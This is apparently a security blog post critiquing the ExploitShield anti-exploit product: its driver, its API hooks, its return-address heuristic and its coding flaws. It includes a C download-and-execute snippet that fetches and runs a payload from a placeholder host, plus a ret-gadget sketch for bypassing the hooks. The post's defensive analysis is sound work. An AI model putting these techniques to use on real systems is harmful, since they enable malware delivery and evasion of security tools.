Ending the Love Affair with ExploitShield

ExploitShield has been marketed as offering protection “against all known and unknown 0-day vulnerability exploits, protecting users where traditional anti-virus and security products fail.” I found this assertion quite extraordinary and exciting! Vulnerabilities in software applications are real problems for computer users worldwide. So far, we have been pretty bad at providing actual technology to help individual users defend against vulnerabilities in software.

In my opinion, Microsoft has made the best advances with their Enhanced Mitigation Experience Toolkit. EMET changes the behavior of the operating system to increase the effort attackers have to expend to produce working exploits. There are blog posts that document exactly what EMET does.

In general, I believe that systems that are upfront and public about their methodologies are more trustworthy than “secret sauce” systems. EMET is very upfront about their methodologies, while ExploitShield conceals them in an attempt to derive additional security from obscurity.

I analyzed the ExploitShield system and technology and the results of my analysis follow. To summarize: the system is very predictable, attackers can easily study it and adapt their attacks to overcome it, and the implementation itself creates new attack surface. After this analysis, I do not believe that this system would help an individual or organization defend themselves against an attacker with any capability to write their own exploits, 0-day or otherwise.

Caveat

The analysis I performed was on their “Browser” edition. It’s possible that something far more advanced is in their “Corporate” edition; I honestly can’t say, because I haven’t seen it. However, given the ‘tone’ of the implementation that I analyzed, and the implementation flaws in it, I doubt this possibility and believe that the “Corporate” edition represents just “more of the same.” I welcome being proven wrong.

Initial Analysis

Usually we can use some excellent and free tools to get a sense of software’s footprint. I like to use GMER for this. GMER surveys the entire system and uses a cross-view technique to identify patches made to running programs.

If you recall ExploitShield’s marketing information, we see popup boxes that look like this:

This screenshot has some tells in it. For example, why is the path specified? If this were really blocking the ‘exploit’, it should never have gotten as far as a path on the file system.

In the following sections, I’ll go over each phase of my analysis as it relates to a component of or a concept within ExploitShield.

ExploitShield uses a Device Driver

One component of the ExploitShield system is a device driver. The device driver uses an operating-system-supported mechanism (PsSetCreateProcessNotifyRoutine) to receive notification from the operating system whenever a process is started.

Each time a process starts, the device driver examines it and optionally loads ExploitShield’s user-mode code module into the starting process. The criterion for loading the user-mode module is whether or not the starting process is one that ExploitShield is protecting.
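
For illustration, here is a minimal sketch of that notification mechanism. It is not ExploitShield’s actual code, and the inspection and injection logic is only indicated in comments.

    #include <ntddk.h>

    /* Minimal sketch: register for process-creation notifications. */
    static VOID ProcessNotify(HANDLE ParentId, HANDLE ProcessId, BOOLEAN Create)
    {
        UNREFERENCED_PARAMETER(ParentId);
        if (Create) {
            /* A driver like ExploitShield's would inspect the new process here
               (e.g. its image name) and, if it is a "shielded" application,
               arrange for its user-mode module to be loaded into it. */
            DbgPrint("Process %p started\n", ProcessId);
        }
    }

    NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
    {
        UNREFERENCED_PARAMETER(DriverObject);
        UNREFERENCED_PARAMETER(RegistryPath);
        /* FALSE = register (TRUE would remove the callback). */
        return PsSetCreateProcessNotifyRoutine(ProcessNotify, FALSE);
    }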

User-Mode Component

The user-mode component seems to exist only to hook/detour specific functions.

The act of function hooking, also called function detouring, involves making modifications to the beginning of a function such that when that function is invoked, another function is invoked instead. The paper on Detours by MS Research explains the concept pretty thoroughly.

Function hooking is commonly used as a way to implement a checker or reference monitor for an application. A security system can detour a function, such as CreateProcessA, and make a heuristics-based decision on the arguments to CreateProcessA. If the heuristic indicates that the behavior is suspect, the security system can take some action, such as failing the call to CreateProcessA or terminating the process.
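
As a rough sketch of this pattern, here is what a detour of CreateProcessA could look like using the Detours API. This is illustrative only; ExploitShield’s own hooking mechanism may differ, and LooksSuspicious is a hypothetical placeholder for whatever heuristic a monitor applies.

    #include <windows.h>
    #include <detours.h>

    /* Pointer to the real CreateProcessA; DetourAttach redirects it through a
       trampoline that still reaches the original code. */
    static BOOL (WINAPI *TrueCreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES,
        LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA,
        LPPROCESS_INFORMATION) = CreateProcessA;

    /* Hypothetical heuristic; a real monitor would inspect the arguments
       and/or the caller here. */
    static BOOL LooksSuspicious(LPCSTR app, LPSTR cmdline)
    {
        UNREFERENCED_PARAMETER(app);
        UNREFERENCED_PARAMETER(cmdline);
        return FALSE;
    }

    static BOOL WINAPI HookedCreateProcessA(LPCSTR app, LPSTR cmdline,
        LPSECURITY_ATTRIBUTES pa, LPSECURITY_ATTRIBUTES ta, BOOL inherit,
        DWORD flags, LPVOID env, LPCSTR dir, LPSTARTUPINFOA si,
        LPPROCESS_INFORMATION pi)
    {
        if (LooksSuspicious(app, cmdline)) {
            SetLastError(ERROR_ACCESS_DENIED);  /* fail the call */
            return FALSE;
        }
        return TrueCreateProcessA(app, cmdline, pa, ta, inherit, flags, env,
                                  dir, si, pi);  /* pass through */
    }

    void InstallHook(void)
    {
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourAttach((PVOID *)&TrueCreateProcessA, HookedCreateProcessA);
        DetourTransactionCommit();
    }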

Hooked Functions

ExploitShield seems to function largely by detouring the following functions:

  • WinExec
  • CreateProcessW/A
  • CreateFileW/A
  • ShellExecute
  • UrlDownloadToFileW/A
  • UrlDownloadToCacheFileW/A

Here we can get a sense of what the authors of ExploitShield meant when they said “After researching thousands of vulnerability exploits ZeroVulnerabilityLabs has developed an innovative patent-pending technology that is able to detect if a shielded application is being exploited maliciously”. These are functions commonly used by shellcode to drop and execute some other program!
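
To make that concrete, the classic “drop and execute” pattern built from these APIs looks roughly like the following. The URL and path are placeholders, and a real payload would do this from injected shellcode rather than from a standalone C program.

    #include <windows.h>
    #include <urlmon.h>
    #pragma comment(lib, "urlmon.lib")

    /* Illustration of the download-and-execute pattern these APIs enable.
       The URL and file path below are placeholders. */
    int main(void)
    {
        if (URLDownloadToFileA(NULL, "http://example.invalid/payload.exe",
                               "C:\\Users\\Public\\payload.exe", 0, NULL) == S_OK) {
            WinExec("C:\\Users\\Public\\payload.exe", SW_HIDE);
        }
        return 0;
    }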

Function Hook Behavior

Each hook implements a straightforward heuristic. On x86, before a procedure is invoked, the address to return to after the procedure finishes is pushed onto the stack. Each hook retrieves this return address from the stack and asks two questions about it:

  • Are the page permissions of the address RX (read-execute)?
  • Is the address located within the bounds of a loaded module?

If either of these two tests fails, ExploitShield reports that it has discovered an exploit!
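
A minimal sketch of such a check might look like the following. This is an approximation of the heuristic described above, not ExploitShield’s code; inside a hook, the return address would be obtained from the stack, for example via _ReturnAddress() from <intrin.h>.

    #include <windows.h>

    /* Sketch: does a return address look like it came from legitimate code? */
    static BOOL ReturnAddressLooksLegitimate(void *ret_addr)
    {
        MEMORY_BASIC_INFORMATION mbi;
        HMODULE mod = NULL;

        if (!VirtualQuery(ret_addr, &mbi, sizeof(mbi)))
            return FALSE;

        /* Test 1: are the page permissions read-execute (not writable)? */
        BOOL rx_only = (mbi.Protect == PAGE_EXECUTE_READ) ||
                       (mbi.Protect == PAGE_EXECUTE);

        /* Test 2: does the address fall within a loaded module? */
        BOOL in_module = GetModuleHandleExW(
            GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
            GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT,
            (LPCWSTR)ret_addr, &mod);

        return rx_only && in_module;
    }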

A Confusion of Terms

  • Vulnerability: A vulnerability is a property of a piece of software that allows for some kind of trust violation. Vulnerabilities have a very broad definition. Memory corruption vulnerabilities have had such an impact on computer security that ‘vulnerability’ is often used simply as shorthand for ‘memory corruption vulnerability’; however, other kinds of vulnerabilities exist, for example information disclosure vulnerabilities or authentication bypass vulnerabilities. An information disclosure vulnerability can sometimes be worse for individual privacy than a memory corruption vulnerability.
  • Exploit: An exploit is software or a procedure that uses a vulnerability to effect some action, usually to execute a payload.
  • Payload: Attacker-created software that executes after a vulnerability has been used to compromise a system.

It is my belief that when ExploitShield uses the term ‘exploit’, they really mean ‘payload’.

A Good Day for ExploitShield

So what does a play-by-play of ExploitShield functioning as expected look like? Let’s take a look, abstracting the details of exactly which exploit is used:

  1. A user is fooled into navigating to a malicious web page under the attacker’s control. They can’t really be blamed too much for this: they only need to make this mistake once, and the visit could be the result of an attacker compromising a legitimate website and using it to serve malware.
  2. This web page contains an exploit for a vulnerability in the user’s browser. The web browser loads the document that contains the exploit and begins to parse and process the exploit document.
  3. The data in the exploit document has been modified such that the program parsing the document does something bad. Let’s say the exploit convinces the web browser to overwrite a function pointer stored somewhere in memory with the address of data also supplied by the exploit. The vulnerable program then calls this function pointer.
  4. Now, the web browser executes code supplied by the exploit. At this point, the web browser has been exploited. The user is running code supplied by the attacker / exploit. At this point, anything could happen. Note how we’ve made it all the way through the ‘exploitation’ stage of this process and ExploitShield hasn’t entered the picture yet.
  5. The executed code calls one of the hooked functions, say WinExec. For this example, let’s say that the code executing is called from a page that is on the heap, so its permissions are RWX (read-write-execute).
  6. ExploitShield’s hook on WinExec fires, inspects the return address on the stack, and finds that it is not within the bounds of a loaded module (and that its page is writable). ExploitShield reports that it has detected an exploit.

ExploitShield is great if the attacker doesn’t know it’s there, and if it isn’t deployed widely enough to be a problem at scale for an attacker. If the attacker knows it’s there, and cares, they can bypass it trivially.

A Bad Day for ExploitShield

If an attacker knows about ExploitShield, how much effort does it take to create an exploit that does not set off the alarms monitored by ExploitShield? I argue it does not take much effort at all. Two immediate possibilities come to mind:

  • Use a (very) primitive form of ROP (Return-Oriented Programming). Identify a ret instruction in a loaded module and push its address onto the stack as the return address the hooked function will see, with your real return address pushed just beneath it. The checks made by ExploitShield will pass. (A sketch of this appears below.)
  • Use a function that is equivalent to one of the hooked functions, but is not the hooked function. If CreateProcess is hooked, use NtCreateProcess instead.

Both of these would defeat the protections I discovered in ExploitShield. Additionally, these techniques would function on systems where ExploitShield is absent, meaning that if an attacker cared to bypass ExploitShield when it was present they would only need to do the work of implementing these bypasses once.
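
As a sketch of the first bypass (an assumption about how it could be implemented, not a demonstrated attack against ExploitShield), finding a usable gadget is as simple as scanning a loaded module’s code section for a single ret byte:

    #include <windows.h>

    /* Find a single 'ret' (0xC3) byte inside a loaded module's code section.
       Returning through this address makes the return address seen by a naive
       hook point into a legitimate module with read-execute permissions. */
    static void *FindRetGadget(HMODULE module)
    {
        IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)module;
        IMAGE_NT_HEADERS *nt  = (IMAGE_NT_HEADERS *)((BYTE *)module + dos->e_lfanew);
        BYTE *code = (BYTE *)module + nt->OptionalHeader.BaseOfCode;
        DWORD size = nt->OptionalHeader.SizeOfCode;
        DWORD i;

        for (i = 0; i < size; i++) {
            if (code[i] == 0xC3)  /* x86 'ret' */
                return code + i;
        }
        return NULL;
    }

    /* Conceptually, the payload then pushes its own return address, pushes the
       gadget's address on top of it, and jumps to (rather than calls) WinExec.
       The hook sees the gadget's in-module, RX address; when WinExec returns,
       the gadget's 'ret' sends control back to the payload. */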

Obscurity Isn’t Always Bad

The principle of ‘security through obscurity’ is often cited by security nerds as a negative property for a security system to hold. However, obscurity does actually make systems more secure as long as the defensive system remains obscure or unpredictable. The difficulty for obscurity-based defensive techniques lies in finding an obscure change that can be made with little cost and that the attacker can’t adapt to before they are disrupted by it, or a change that can be altered for very little cost when its obscurity is compromised.

For example, consider PatchGuard from Microsoft. PatchGuard ‘protects’ the system by crashing it when modifications are detected. The operation of PatchGuard is concealed and not published by Microsoft. As long as PatchGuard’s operation is obscured and secret, it can protect systems by crashing them when it detects modifications made by a rootkit.

However, PatchGuard has been frequently reverse engineered and studied by security researchers. Each time a researcher has sat down with the intent to bypass PatchGuard, they have met with success. The interesting thing is what happens next: at some point in the future, Microsoft silently releases an update that changes the behavior of PatchGuard such that it still accomplishes its goal of crashing the system if modifications are detected, but is not vulnerable to attacks created by security researchers.

In this instance, obscurity works. It’s very cheap for Microsoft to make a new PatchGuard; indeed, the kernel team might have ten of them “on the bench” waiting for the currently fielded version to be dissected and bypassed. This changes the kernel from a static target into a moving target. The obscurity works because it is at Microsoft’s initiative to change the mechanism, changes are both cheap and effective, and the attacker can’t easily prepare to avoid these changes when they’re made.

The changes that ExploitShield introduces are extremely brittle and cannot be modified as readily. Perhaps if ExploitShield were an engine to quickly deliver a broad variety of runtime changes and randomly vary them per application, this dynamic would be different.

Some Implementation Problems

Implementing a HIPS (host-based intrusion prevention system) correctly is a lot of work! There are fiddly engineering decisions to make everywhere, and as the author you are interposing yourself into a very sticky security situation. ExploitShield makes some unnecessarily risky implementation decisions.

The IOCTL Interface

The driver exposes an interface that is accessible to all users. Traditional best practice for legacy Windows drivers is that interfaces to the driver be accessible only to the users that should access them. The ExploitShield interface, however, is accessible to the entire system, including unprivileged users.

The driver processes messages that are sent to it. I didn’t fully work out what type of messages these are, or their format; however, IOCTL-handling code is full of possibilities for subtle mistakes. Any mistake inside the IOCTL-handling code could lead to a kernel-level vulnerability, which would compromise the security of your entire system.

This interface creates additional attack surface.
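
For contrast, the usual way to avoid this exposure is to create the control device with a restrictive security descriptor. A minimal sketch follows; the device name is illustrative, and this is not ExploitShield’s code.

    #include <ntddk.h>
    #include <wdmsec.h>  /* IoCreateDeviceSecure, SDDL_DEVOBJ_* strings */

    /* Create a control device that only SYSTEM and Administrators can open,
       instead of leaving it accessible to every user on the system. */
    NTSTATUS CreateRestrictedControlDevice(PDRIVER_OBJECT DriverObject,
                                           PDEVICE_OBJECT *DeviceObject)
    {
        UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Device\\ExampleShield");

        /* SDDL_DEVOBJ_SYS_ALL_ADM_ALL: full access for SYSTEM and
           Administrators, no access for unprivileged users. */
        return IoCreateDeviceSecure(DriverObject,
                                    0,                      /* no device extension */
                                    &name,
                                    FILE_DEVICE_UNKNOWN,
                                    FILE_DEVICE_SECURE_OPEN,
                                    FALSE,                  /* not exclusive */
                                    &SDDL_DEVOBJ_SYS_ALL_ADM_ALL,
                                    NULL,                   /* no class GUID */
                                    DeviceObject);
    }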

The Hook Logic

Each hook invokes a routine to check if the return address is located in a loaded module. This routine makes use of a global list of modules that is populated only once, by a call to EnumerateLoadedModules with a programmer-supplied callback. There are two bugs in ExploitShield’s method of retrieving the list of loaded modules.

The first bug is that there is apparently no mutual exclusion around the critical section of populating the global list. Multiple threads can call CreateProcessA at once, so it is theoretically possible for the user-mode logic to place itself into an inconsistent state.

The second bug is that the modules are enumerated only once. Once EnumerateLoadedModules has been invoked, a global flag is set to true and EnumerateLoadedModules is never invoked again. If the system observes a call to CreateProcess (populating the list), a new module is subsequently loaded, and that module later calls CreateProcess, the security system will erroneously flag that module as an attempted exploit, because its return address is not in the stale list.

Neither of these flaws exposes the user to any additional danger; they just indicate poor programming practice.
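
The first bug has a standard fix: wrap the population step in one-time initialization. The sketch below assumes a simple module table of my own invention (ExploitShield’s real data structures are unknown). The second bug argues for not caching at all, for example by asking the loader about each return address directly, as in the earlier return-address sketch.

    #include <windows.h>
    #include <dbghelp.h>
    #pragma comment(lib, "dbghelp.lib")

    /* Hypothetical module table; the real product's layout is unknown. */
    typedef struct { DWORD64 base; ULONG size; } MODULE_RANGE;
    static MODULE_RANGE g_modules[512];
    static ULONG g_moduleCount;
    static INIT_ONCE g_once = INIT_ONCE_STATIC_INIT;

    static BOOL CALLBACK RecordModule(PCSTR name, DWORD64 base, ULONG size, PVOID ctx)
    {
        UNREFERENCED_PARAMETER(name);
        UNREFERENCED_PARAMETER(ctx);
        if (g_moduleCount < ARRAYSIZE(g_modules)) {
            g_modules[g_moduleCount].base = base;
            g_modules[g_moduleCount].size = size;
            g_moduleCount++;
        }
        return TRUE;  /* continue enumeration */
    }

    static BOOL CALLBACK PopulateOnce(PINIT_ONCE once, PVOID param, PVOID *ctx)
    {
        UNREFERENCED_PARAMETER(once);
        UNREFERENCED_PARAMETER(param);
        UNREFERENCED_PARAMETER(ctx);
        /* Runs exactly once, even if several hooked calls race to get here. */
        return EnumerateLoadedModules64(GetCurrentProcess(), RecordModule, NULL);
    }

    void EnsureModuleList(void)
    {
        InitOnceExecuteOnce(&g_once, PopulateOnce, NULL, NULL);
    }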

Why Hook At All?

An especially baffling decision made in the implementation of ExploitShield is the use of hooks at all! For each event that ExploitShield concerns itself with (process creation and file write), there are robust callback infrastructures present in the NT kernel. Indeed, authors of traditional anti-virus software so frequently reduced system stability with overly zealous use of hooks that Microsoft very strongly encouraged them to use this in-kernel monitoring API.
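
For the process-creation case in particular, here is a sketch of that supported route. PolicySaysBlock is a placeholder for whatever heuristic a product might apply; nothing here is ExploitShield’s code, and the file-write case has an analogous supported mechanism in the filesystem minifilter framework.

    #include <ntddk.h>

    /* Placeholder heuristic; a real product would inspect the image name,
       command line, parent process, and so on. */
    static BOOLEAN PolicySaysBlock(PCUNICODE_STRING ImageFileName)
    {
        UNREFERENCED_PARAMETER(ImageFileName);
        return FALSE;
    }

    /* Supported, hook-free way to observe and even veto process creation. */
    static VOID CreateProcessNotifyEx(PEPROCESS Process, HANDLE ProcessId,
                                      PPS_CREATE_NOTIFY_INFO CreateInfo)
    {
        UNREFERENCED_PARAMETER(Process);
        UNREFERENCED_PARAMETER(ProcessId);

        if (CreateInfo == NULL)   /* process is exiting; nothing to decide */
            return;

        if (PolicySaysBlock(CreateInfo->ImageFileName)) {
            CreateInfo->CreationStatus = STATUS_ACCESS_DENIED;  /* veto it */
        }
    }

    /* Registration, e.g. from DriverEntry:
         PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyEx, FALSE); */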

ExploitShield uses unnecessarily dangerous programming practices to achieve effects that are possible using legitimate system services, possibly betraying a lack of understanding of the platform it aims to protect.

The Impossibility of ExploitShield’s Success

What can ExploitShield do to change this dynamic? The problem is, not much. Defensive systems like this are wholly dependent on obscurity. Once studied by attackers, the systems lose their value. In the case of software like this, one problem is that the feedback loop does not inform the authors or users of the security software that the attacker has adapted to the security system. Another problem is that the obscurity of a system is difficult to maintain. The software has to be used by customers, so it has to be available in some sense, and if it is available for customers, it will most likely also be available for study by an attacker.

What Hope Do We Have?

It’s important to note that EMET differs from ExploitShield in an important regard: EMET aims to disrupt the act of exploiting a program, while ExploitShield aims to disrupt the act of executing a payload on a system. These might seem like fine points; however, a distinction can be made around how many effective choices the attacker has. When it comes to executing payloads, the attacker’s choices are nearly infinite, since they are already executing arbitrary code.

In this regard, EMET is generally not based on obscurity. The authors of EMET are very willing to discuss in great detail the different mitigation strategies they implement, while the author of ExploitShield has yet to do so.

Generally, I believe that if a defensive technique makes a deterministic change to program or run-time behavior, an attack will fail until it is adapted to that technique. How much protection this provides depends on the obscurity of the technique and on whether the change impacts the vulnerability, the exploit, or the payload. If the attack cannot be adapted to the modified environment at all, then the obscurity of the mitigation is irrelevant.

However, what if the technique was not obscure, but was instead unpredictable? What if there was a defensive technique that would randomly adjust system implementation behavior while preserving the semantic behavior of the system as experienced by the program? What is needed is identification of properties of a system that, if changed, would affect the functioning of attacks but would not change the functioning of programs.

When these properties are varied randomly, the attacker has fewer options. Perhaps they are aware of a vulnerability that can transcend any permutation of implementation details. If they are not, however, they are entirely at the mercy of chance for whether or not their attack will succeed.

Conclusion

ExploitShield is a time capsule containing the best host-based security technology that 2004 had to offer. In my opinion, it doesn’t represent a meaningful change in the computer security landscape. The techniques it uses hinge wholly on obscurity and secrecy, require very little work to overcome, and affect only the later stage of computer attacks, the payload, not the exploit.

When compared to other defensive technologies, ExploitShield comes up short. It uses poorly implemented techniques that work against phases of the attack that require very little attacker adaptation to overcome. Once ExploitShield gains enough market traction, malware authors and exploit writers will automate techniques that work around it.

ExploitShield even increases your attack surface by installing a kernel-mode driver that will process messages sent by any user on the system. Any flaws in that kernel-mode driver could introduce a privilege escalation bug into your system.

The detection logic it uses to find shellcode is not wholly flawed. It contains an implementation error that could result in some false positives, but it is generally the case that a call to a runtime library function with a return address outside the bounds of a loaded module is suspicious. The problem with this detection signature is that an attack can be trivially modified to achieve the same effect without triggering it. Additionally, this detection signature is not novel; HIPS products have implemented this check for a long time.

This is a shame, because, in my opinion, there is still some serious room for innovation in this type of software…